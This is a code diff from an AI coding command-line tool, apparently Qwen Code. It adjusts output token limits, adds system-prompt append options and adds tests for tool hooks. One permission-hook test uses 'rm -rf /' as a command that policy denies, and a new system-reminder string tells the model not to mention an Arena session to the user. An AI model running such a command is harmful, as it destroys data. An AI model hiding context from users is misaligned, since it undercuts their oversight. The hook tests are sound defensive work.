// Unknown models without user config: use DEFAULT_OUTPUT_TOKEN_LIMIT + const request: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'custom-deployment-alias', + messages: [{ role: 'user', content: 'Hello' }], + }; + + const result = provider.buildRequest(request, 'prompt-id'); + + // Uses conservative default (32K) + expect(result.max_tokens).toBe(32000); + 
}); + + it('should cap max_tokens for known models to avoid API errors', () => { + // Known models (GPT-4): user config is capped at model limit + const request: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'gpt-4', + messages: [{ role: 'user', content: 'Hello' }], + max_tokens: 100000, // Exceeds GPT-4's 16K limit + }; + + const result = provider.buildRequest(request, 'prompt-id'); + + // Capped to GPT-4's output limit (16K) + expect(result.max_tokens).toBe(16384); + }); + + it('should treat null max_tokens as not configured', () => { + const request: OpenAI.Chat.ChatCompletionCreateParams = { + model: 'gpt-4', + messages: [{ role: 'user', content: 'Hello' }], + max_tokens: null as unknown as undefined, + }; + + const result = provider.buildRequest(request, 'prompt-id'); + + // GPT-4 has 16K output limit, so conservative default is still 16K + expect(result.max_tokens).toBe(16384); + }); + it('should preserve all sampling parameters', () => { const originalRequest: OpenAI.Chat.ChatCompletionCreateParams = { model: 'gpt-3.5-turbo', @@ -230,7 +300,10 @@ describe('DefaultOpenAICompatibleProvider', () => { const result = provider.buildRequest(minimalRequest, 'prompt-id'); - expect(result).toEqual(minimalRequest); + // Should set conservative max_tokens default + expect(result.model).toBe('gpt-4'); + expect(result.messages).toEqual(minimalRequest.messages); + expect(result.max_tokens).toBe(16384); // GPT-4 has 16K limit, min(16K, 32K) = 16K }); it('should handle streaming requests', () => { @@ -242,8 +315,11 @@ describe('DefaultOpenAICompatibleProvider', () => { const result = provider.buildRequest(streamingRequest, 'prompt-id'); - expect(result).toEqual(streamingRequest); + // Should set conservative max_tokens default while preserving stream + expect(result.model).toBe('gpt-4'); + expect(result.messages).toEqual(streamingRequest.messages); expect(result.stream).toBe(true); + expect(result.max_tokens).toBe(16384); // GPT-4 has 16K limit, min(16K, 32K) = 16K }); 
it('should not modify the original request object', () => { @@ -287,6 +363,7 @@ describe('DefaultOpenAICompatibleProvider', () => { expect(result).toEqual({ ...originalRequest, + max_tokens: 16384, // GPT-4 has 16K limit, min(16K, 32K) = 16K custom_param: 'custom_value', nested: { key: 'value' }, }); @@ -301,7 +378,11 @@ describe('DefaultOpenAICompatibleProvider', () => { const result = provider.buildRequest(originalRequest, 'prompt-id'); - expect(result).toEqual(originalRequest); + // Should preserve original params and set conservative max_tokens default + expect(result.model).toBe('gpt-4'); + expect(result.messages).toEqual(originalRequest.messages); + expect(result.temperature).toBe(0.7); + expect(result.max_tokens).toBe(16384); // GPT-4 has 16K limit, min(16K, 32K) = 16K expect(result).not.toHaveProperty('custom_param'); }); }); diff --git a/packages/core/src/core/openaiContentGenerator/provider/default.ts b/packages/core/src/core/openaiContentGenerator/provider/default.ts index 783c962d1..ec7f6946a 100644 --- a/packages/core/src/core/openaiContentGenerator/provider/default.ts +++ b/packages/core/src/core/openaiContentGenerator/provider/default.ts @@ -5,6 +5,11 @@ import type { ContentGeneratorConfig } from '../../contentGenerator.js'; import { DEFAULT_TIMEOUT, DEFAULT_MAX_RETRIES } from '../constants.js'; import type { OpenAICompatibleProvider } from './types.js'; import { buildRuntimeFetchOptions } from '../../../utils/runtimeFetchOptions.js'; +import { + tokenLimit, + DEFAULT_OUTPUT_TOKEN_LIMIT, + hasExplicitOutputLimit, +} from '../../tokenLimits.js'; /** * Default provider for standard OpenAI-compatible APIs @@ -65,9 +70,13 @@ export class DefaultOpenAICompatibleProvider _userPromptId: string, ): OpenAI.Chat.ChatCompletionCreateParams { const extraBody = this.contentGeneratorConfig.extra_body; - // Default provider doesn't need special enhancements, just pass through all parameters + + // Apply output token limits to ensure max_tokens is set appropriately 
+ // This prevents occupying too much context window with output reservation + const requestWithTokenLimits = this.applyOutputTokenLimit(request); + return { - ...request, // Preserve all original parameters including sampling params + ...requestWithTokenLimits, ...(extraBody ? extraBody : {}), }; } @@ -75,4 +84,70 @@ export class DefaultOpenAICompatibleProvider getDefaultGenerationConfig(): GenerateContentConfig { return {}; } + + /** + * Apply output token limit to a request's max_tokens parameter. + * + * Purpose: + * Some APIs (e.g., OpenAI-compatible) default to a very small max_tokens value, + * which can cause responses to be truncated mid-output. This function ensures + * a reasonable default is set while respecting user configuration. + * + * Logic: + * 1. If user explicitly configured max_tokens: + * - For known models (in OUTPUT_PATTERNS): use the user's value, but cap at + * model's max output limit to avoid API errors + * (input + max_output > contextWindowSize would cause 400 errors on some APIs) + * - For unknown models (deployment aliases, self-hosted): respect user's + * configured value entirely (backend may support larger limits) + * 2. If user didn't configure max_tokens: + * - Use min(modelLimit, DEFAULT_OUTPUT_TOKEN_LIMIT) + * - This provides a conservative default (32K) that avoids truncating output + * while preserving input quota (not occupying too much context window) + * 3. 
If model has no specific limit (tokenLimit returns default): + * - Still apply DEFAULT_OUTPUT_TOKEN_LIMIT as safeguard + * + * Examples: + * - User sets 4K, known model limit 64K → uses 4K (respects user preference) + * - User sets 100K, known model limit 64K → uses 64K (capped to avoid API error) + * - User sets 100K, unknown model → uses 100K (respects user, backend may support it) + * - User not set, model limit 64K → uses 32K (conservative default) + * - User not set, model limit 8K → uses 8K (model limit is lower) + * + * @param request - The chat completion request parameters + * @returns The request with max_tokens adjusted according to the logic + */ + protected applyOutputTokenLimit< + T extends { max_tokens?: number | null; model: string }, + >(request: T): T { + const userMaxTokens = request.max_tokens; + + // Get model-specific output limit and check if model is known + const modelLimit = tokenLimit(request.model, 'output'); + const isKnownModel = hasExplicitOutputLimit(request.model); + + // Determine the effective max_tokens + let effectiveMaxTokens: number; + + if (userMaxTokens !== undefined && userMaxTokens !== null) { + // User explicitly configured max_tokens + if (isKnownModel) { + // Known model: respect user config but cap at model limit to avoid API errors + effectiveMaxTokens = Math.min(userMaxTokens, modelLimit); + } else { + // Unknown model (deployment aliases, self-hosted): respect user's value + // The backend may support larger limits than our default + effectiveMaxTokens = userMaxTokens; + } + } else { + // User didn't configure, use conservative default: + // min(model-specific limit, DEFAULT_OUTPUT_TOKEN_LIMIT) + effectiveMaxTokens = Math.min(modelLimit, DEFAULT_OUTPUT_TOKEN_LIMIT); + } + + return { + ...request, + max_tokens: effectiveMaxTokens, + }; + } } diff --git a/packages/core/src/core/prompts.test.ts b/packages/core/src/core/prompts.test.ts index 176efeb60..b0947e98f 100644 --- a/packages/core/src/core/prompts.test.ts +++ 
b/packages/core/src/core/prompts.test.ts @@ -80,6 +80,35 @@ describe('Core System Prompt (prompts.ts)', () => { expect(prompt).toMatchSnapshot(); // Snapshot the combined prompt }); + it('should append extra system prompt instructions after user memory when provided', () => { + vi.stubEnv('SANDBOX', undefined); + const memory = 'Remember the project conventions.'; + const appendInstruction = 'Always answer in exactly one sentence.'; + const prompt = getCoreSystemPrompt(memory, undefined, appendInstruction); + + expect(prompt).toContain(`\n\n---\n\n${memory}`); + expect(prompt).toContain(`\n\n---\n\n${appendInstruction}`); + expect(prompt.indexOf(memory)).toBeLessThan( + prompt.indexOf(appendInstruction), + ); + }); + + it('should append extra instructions after a custom system prompt and user memory', () => { + const customInstruction = 'You are a release manager.'; + const userMemory = 'The repo uses pnpm.'; + const appendInstruction = 'Only report blocking issues.'; + + const result = getCustomSystemPrompt( + customInstruction, + userMemory, + appendInstruction, + ); + + expect(result).toBe( + [customInstruction, userMemory, appendInstruction].join('\n\n---\n\n'), + ); + }); + it('should include sandbox-specific instructions when SANDBOX env var is set', () => { vi.stubEnv('SANDBOX', 'true'); // Generic sandbox value const prompt = getCoreSystemPrompt(); diff --git a/packages/core/src/core/prompts.ts b/packages/core/src/core/prompts.ts index bdf4c6dc1..b2799b79b 100644 --- a/packages/core/src/core/prompts.ts +++ b/packages/core/src/core/prompts.ts @@ -72,11 +72,13 @@ export function resolvePathFromEnv(envVar?: string): { * * @param customInstruction - Custom system instruction (ContentUnion from @google/genai) * @param userMemory - User memory to append - * @returns Processed custom system instruction with user memory appended + * @param appendInstruction - Extra instructions to append after user memory + * @returns Processed custom system instruction with user 
memory and extra append instructions applied */ export function getCustomSystemPrompt( customInstruction: GenerateContentConfig['systemInstruction'], userMemory?: string, + appendInstruction?: string, ): string { // Extract text from custom instruction let instructionText = ''; @@ -100,17 +102,20 @@ export function getCustomSystemPrompt( } // Append user memory using the same pattern as getCoreSystemPrompt - const memorySuffix = - userMemory && userMemory.trim().length > 0 - ? `\n\n---\n\n${userMemory.trim()}` - : ''; + const memorySuffix = buildSystemPromptSuffix(userMemory); - return `${instructionText}${memorySuffix}`; + return `${instructionText}${memorySuffix}${buildSystemPromptSuffix(appendInstruction)}`; +} + +function buildSystemPromptSuffix(text?: string): string { + const trimmed = text?.trim(); + return trimmed ? `\n\n---\n\n${trimmed}` : ''; } export function getCoreSystemPrompt( userMemory?: string, model?: string, + appendInstruction?: string, ): string { // if QWEN_SYSTEM_MD is set (and not 0|false), override system prompt from file // default path is .qwen/system.md but can be modified via custom path in QWEN_SYSTEM_MD @@ -338,10 +343,11 @@ Your core function is efficient and safe assistance. Balance extreme conciseness const memorySuffix = userMemory && userMemory.trim().length > 0 - ? `\n\n---\n\n${userMemory.trim()}` + ? buildSystemPromptSuffix(userMemory) : ''; + const appendSuffix = buildSystemPromptSuffix(appendInstruction); - return `${basePrompt}${memorySuffix}`; + return `${basePrompt}${memorySuffix}${appendSuffix}`; } /** @@ -859,6 +865,16 @@ Plan mode is active. The user indicated that they do not want you to execute yet `; } +/** + * Generates a system reminder about an active Arena session. 
+ * + * @param configFilePath - Absolute path to the arena session's `config.json` + * @returns A formatted system reminder string wrapped in XML tags + */ +export function getArenaSystemReminder(configFilePath: string): string { + return `An Arena session is active. For details, read: ${configFilePath}. This message is for internal use only. Do not mention this to user in your response.`; +} + // ============================================================================ // Insight Analysis Prompts // ============================================================================ diff --git a/packages/core/src/core/tokenLimits.test.ts b/packages/core/src/core/tokenLimits.test.ts index 1ba9d4fd1..4c79cfe71 100644 --- a/packages/core/src/core/tokenLimits.test.ts +++ b/packages/core/src/core/tokenLimits.test.ts @@ -192,8 +192,8 @@ describe('tokenLimit', () => { }); describe('MiniMax', () => { - it('should return 1M for MiniMax-M2.5 (latest)', () => { - expect(tokenLimit('MiniMax-M2.5')).toBe(1000000); + it('should return 196608 for MiniMax-M2.5 (latest)', () => { + expect(tokenLimit('MiniMax-M2.5')).toBe(196608); }); it('should return 200K for MiniMax fallback', () => { @@ -284,12 +284,14 @@ describe('tokenLimit with output type', () => { describe('other output limits', () => { it('should return correct output limits for DeepSeek', () => { expect(tokenLimit('deepseek-reasoner', 'output')).toBe(65536); + expect(tokenLimit('deepseek-r1', 'output')).toBe(65536); + expect(tokenLimit('deepseek-r1-0528', 'output')).toBe(65536); expect(tokenLimit('deepseek-chat', 'output')).toBe(8192); }); it('should return correct output limits for GLM', () => { - expect(tokenLimit('glm-5', 'output')).toBe(131072); - expect(tokenLimit('glm-4.7', 'output')).toBe(131072); + expect(tokenLimit('glm-5', 'output')).toBe(16384); + expect(tokenLimit('glm-4.7', 'output')).toBe(16384); }); it('should return correct output limits for MiniMax', () => { diff --git a/packages/core/src/core/tokenLimits.ts 
b/packages/core/src/core/tokenLimits.ts index df911a936..e890d0cab 100644 --- a/packages/core/src/core/tokenLimits.ts +++ b/packages/core/src/core/tokenLimits.ts @@ -9,7 +9,7 @@ type TokenCount = number; export type TokenLimitType = 'input' | 'output'; export const DEFAULT_TOKEN_LIMIT: TokenCount = 131_072; // 128K (power-of-two) -export const DEFAULT_OUTPUT_TOKEN_LIMIT: TokenCount = 8_192; // 8K tokens +export const DEFAULT_OUTPUT_TOKEN_LIMIT: TokenCount = 32_000; // 32K tokens /** * Accurate numeric limits: @@ -21,6 +21,7 @@ const LIMITS = { '32k': 32_768, '64k': 65_536, '128k': 131_072, + '192k': 196_608, // MiniMax-M2.5 context window '200k': 200_000, // vendor-declared decimal, used by OpenAI, Anthropic, etc. '256k': 262_144, '272k': 272_000, // vendor-declared decimal, GPT-5.x input (400K total - 128K output) @@ -128,7 +129,7 @@ const PATTERNS: Array<[RegExp, TokenCount]> = [ // ------------------- // MiniMax // ------------------- - [/^minimax-m2\.5/i, LIMITS['1m']], // MiniMax-M2.5: 1,000,000 + [/^minimax-m2\.5/i, LIMITS['192k']], // MiniMax-M2.5: 196,608 [/^minimax-/i, LIMITS['200k']], // MiniMax fallback: 200K // ------------------- @@ -166,14 +167,16 @@ const OUTPUT_PATTERNS: Array<[RegExp, TokenCount]> = [ [/^qwen3\.5/, LIMITS['64k']], [/^coder-model$/, LIMITS['64k']], [/^qwen3-max/, LIMITS['64k']], + [/^qwen/, LIMITS['8k']], // Qwen fallback (VL, turbo, plus, etc.): 8K // DeepSeek [/^deepseek-reasoner/, LIMITS['64k']], + [/^deepseek-r1/, LIMITS['64k']], [/^deepseek-chat/, LIMITS['8k']], // Zhipu GLM - [/^glm-5/, LIMITS['128k']], - [/^glm-4\.7/, LIMITS['128k']], + [/^glm-5/, LIMITS['16k']], + [/^glm-4\.7/, LIMITS['16k']], // MiniMax [/^minimax-m2\.5/i, LIMITS['64k']], @@ -182,6 +185,19 @@ const OUTPUT_PATTERNS: Array<[RegExp, TokenCount]> = [ [/^kimi-k2\.5/, LIMITS['32k']], ]; +/** + * Check if a model has an explicitly defined output token limit. 
+ * This distinguishes between models with known limits in OUTPUT_PATTERNS + * and unknown models that would fallback to DEFAULT_OUTPUT_TOKEN_LIMIT. + * + * @param model - The model name to check + * @returns true if the model has an explicit output limit definition, false if it uses the default fallback + */ +export function hasExplicitOutputLimit(model: Model): boolean { + const norm = normalize(model); + return OUTPUT_PATTERNS.some(([regex]) => regex.test(norm)); +} + /** * Return the token limit for a model string based on the specified type. * diff --git a/packages/core/src/core/toolHookTriggers.test.ts b/packages/core/src/core/toolHookTriggers.test.ts new file mode 100644 index 000000000..1e93fceb4 --- /dev/null +++ b/packages/core/src/core/toolHookTriggers.test.ts @@ -0,0 +1,980 @@ +/** + * @license + * Copyright 2026 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi } from 'vitest'; +import { + generateToolUseId, + firePreToolUseHook, + firePostToolUseHook, + firePostToolUseFailureHook, + fireNotificationHook, + appendAdditionalContext, + firePermissionRequestHook, +} from './toolHookTriggers.js'; +import type { MessageBus } from '../confirmation-bus/message-bus.js'; +import { NotificationType } from '../hooks/types.js'; +import { MessageBusType } from '../confirmation-bus/types.js'; + +// Mock the MessageBus +const createMockMessageBus = () => + ({ + request: vi.fn(), + }) as unknown as MessageBus; + +describe('toolHookTriggers', () => { + describe('generateToolUseId', () => { + it('should generate unique IDs with the correct prefix', () => { + const id1 = generateToolUseId(); + const id2 = generateToolUseId(); + + expect(id1).toMatch(/^toolu_\d+_[a-z0-9]+$/); + expect(id2).toMatch(/^toolu_\d+_[a-z0-9]+$/); + expect(id1).not.toBe(id2); + }); + + it('should generate IDs with current timestamp', () => { + const mockTime = Date.now(); + vi.spyOn(global.Date, 'now').mockImplementation(() => mockTime); + + const id = 
generateToolUseId(); + + expect(id).toContain(`toolu_${mockTime}`); + }); + }); + + describe('firePreToolUseHook', () => { + it('should return shouldProceed: true when no messageBus is provided', async () => { + const result = await firePreToolUseHook( + undefined, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldProceed: true }); + }); + + it('should return shouldProceed: true when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: false, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldProceed: true }); + }); + + it('should return shouldProceed: true when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldProceed: true }); + }); + + it('should return shouldProceed: false with denied type when tool is denied', async () => { + const mockOutput = { + hookSpecificOutput: { + permissionDecision: 'deny', + permissionDecisionReason: 'Tool not allowed', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldProceed: false, + blockReason: 'Tool not allowed', + blockType: 'denied', + }); + }); + + it('should return shouldProceed: false with ask type when confirmation is required', async () => { + const mockOutput = { + hookSpecificOutput: { + permissionDecision: 'ask', + permissionDecisionReason: 'User 
confirmation required', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldProceed: false, + blockReason: 'User confirmation required', + blockType: 'ask', + }); + }); + + it('should return shouldProceed: false with stop type when execution should stop', async () => { + const mockOutput = { + continue: false, + reason: 'Execution stopped by policy', + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldProceed: false, + blockReason: 'Execution stopped by policy', + blockType: 'stop', + }); + }); + + it('should return shouldProceed: true with additional context when available', async () => { + const mockOutput = { + hookSpecificOutput: { + additionalContext: 'Additional context here', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldProceed: true, + additionalContext: 'Additional context here', + }); + }); + + it('should handle hook execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldProceed: true }); + }); + }); + + 
describe('firePostToolUseHook', () => { + it('should return shouldStop: false when no messageBus is provided', async () => { + const result = await firePostToolUseHook( + undefined, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldStop: false }); + }); + + it('should return shouldStop: false when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: false, + }); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldStop: false }); + }); + + it('should return shouldStop: false when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldStop: false }); + }); + + it('should return shouldStop: true with stop reason when execution should stop', async () => { + const mockOutput = { + continue: false, + reason: 'Execution stopped by policy', + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldStop: true, + stopReason: 'Execution stopped by policy', + }); + }); + + it('should return shouldStop: false with additional context when available', async () => { + const mockOutput = { + hookSpecificOutput: { + additionalContext: 'Additional context here', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: 
mockOutput, + }); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldStop: false, + additionalContext: 'Additional context here', + }); + }); + + it('should handle hook execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldStop: false }); + }); + }); + + describe('firePostToolUseFailureHook', () => { + it('should return empty object when no messageBus is provided', async () => { + const result = await firePostToolUseFailureHook( + undefined, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({}); + }); + + it('should return empty object when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: false, + }); + + const result = await firePostToolUseFailureHook( + mockMessageBus, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({}); + }); + + it('should return empty object when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await firePostToolUseFailureHook( + mockMessageBus, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({}); + }); + + it('should return additional context when available', async () => { + const mockOutput = { + hookSpecificOutput: { + additionalContext: 'Additional context about the failure', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as 
ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePostToolUseFailureHook( + mockMessageBus, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({ + additionalContext: 'Additional context about the failure', + }); + }); + + it('should handle hook execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await firePostToolUseFailureHook( + mockMessageBus, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({}); + }); + }); + + describe('appendAdditionalContext', () => { + it('should return original content when no additional context is provided', () => { + const result = appendAdditionalContext('original content', undefined); + expect(result).toBe('original content'); + }); + + it('should append context to string content', () => { + const result = appendAdditionalContext( + 'original content', + 'additional context', + ); + expect(result).toBe('original content\n\nadditional context'); + }); + + it('should append context as text part to PartListUnion array', () => { + const originalContent = [{ text: 'original' }]; + const result = appendAdditionalContext( + originalContent, + 'additional context', + ); + + expect(result).toEqual([ + { text: 'original' }, + { text: 'additional context' }, + ]); + }); + + it('should handle non-array PartListUnion content', () => { + const originalContent = { text: 'original' }; + const result = appendAdditionalContext( + originalContent, + 'additional context', + ); + + expect(result).toEqual({ text: 'original' }); + }); + + it('should return original array content when no additional context is provided', () => { + const originalContent = [{ text: 'original' }]; + const result = appendAdditionalContext(originalContent, undefined); + + expect(result).toEqual([{ text: 
'original' }]); + }); + }); + + describe('fireNotificationHook', () => { + it('should return empty object when no messageBus is provided', async () => { + const result = await fireNotificationHook( + undefined, + 'Test notification', + NotificationType.PermissionPrompt, + 'Test Title', + ); + + expect(result).toEqual({}); + }); + + it('should return empty object when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: false, + }); + + const result = await fireNotificationHook( + mockMessageBus, + 'Test notification', + NotificationType.PermissionPrompt, + ); + + expect(result).toEqual({}); + }); + + it('should return empty object when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await fireNotificationHook( + mockMessageBus, + 'Test notification', + NotificationType.IdlePrompt, + ); + + expect(result).toEqual({}); + }); + + it('should return additional context when available', async () => { + const mockOutput = { + hookSpecificOutput: { + additionalContext: 'Additional context from notification hook', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await fireNotificationHook( + mockMessageBus, + 'Test notification', + NotificationType.AuthSuccess, + ); + + expect(result).toEqual({ + additionalContext: 'Additional context from notification hook', + }); + }); + + it('should send correct parameters to MessageBus for permission_prompt', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Qwen Code needs your permission 
to use Bash', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Qwen Code needs your permission to use Bash', + notification_type: 'permission_prompt', + title: 'Permission needed', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should send correct parameters to MessageBus for idle_prompt', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Qwen Code is waiting for your input', + notification_type: 'idle_prompt', + title: 'Waiting for input', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should send correct parameters to MessageBus for auth_success', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Authentication successful', + NotificationType.AuthSuccess, + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Authentication successful', + notification_type: 'auth_success', + title: undefined, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should send correct parameters to MessageBus for elicitation_dialog', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + 
success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Dialog shown to user', + NotificationType.ElicitationDialog, + 'Dialog', + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Dialog shown to user', + notification_type: 'elicitation_dialog', + title: 'Dialog', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should handle hook execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await fireNotificationHook( + mockMessageBus, + 'Test notification', + NotificationType.PermissionPrompt, + ); + + expect(result).toEqual({}); + }); + + it('should handle notification without title', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Test notification without title', + NotificationType.IdlePrompt, + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Test notification without title', + notification_type: 'idle_prompt', + title: undefined, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + }); + + describe('firePermissionRequestHook', () => { + it('should return hasDecision: false when no messageBus is provided', async () => { + const result = await firePermissionRequestHook( + undefined, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ hasDecision: false }); + }); + + it('should return hasDecision: false when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + 
success: false, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ hasDecision: false }); + }); + + it('should return hasDecision: false when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ hasDecision: false }); + }); + + it('should return hasDecision: true with allow decision when tool is allowed', async () => { + const mockOutput = { + hookSpecificOutput: { + decision: { + behavior: 'allow', + updatedInput: { command: 'ls -la' }, + message: 'Tool allowed by policy', + }, + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'run_shell_command', + { command: 'ls' }, + 'auto', + ); + + expect(result).toEqual({ + hasDecision: true, + shouldAllow: true, + updatedInput: { command: 'ls -la' }, + denyMessage: undefined, + shouldInterrupt: undefined, + }); + }); + + it('should return hasDecision: true with deny decision when tool is denied', async () => { + const mockOutput = { + hookSpecificOutput: { + decision: { + behavior: 'deny', + message: 'Tool denied by policy', + interrupt: true, + }, + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'run_shell_command', + { command: 'rm -rf /' }, + 'auto', + ); + + expect(result).toEqual({ + hasDecision: true, + shouldAllow: false, + denyMessage: 'Tool denied by policy', + shouldInterrupt: true, + }); + }); + 
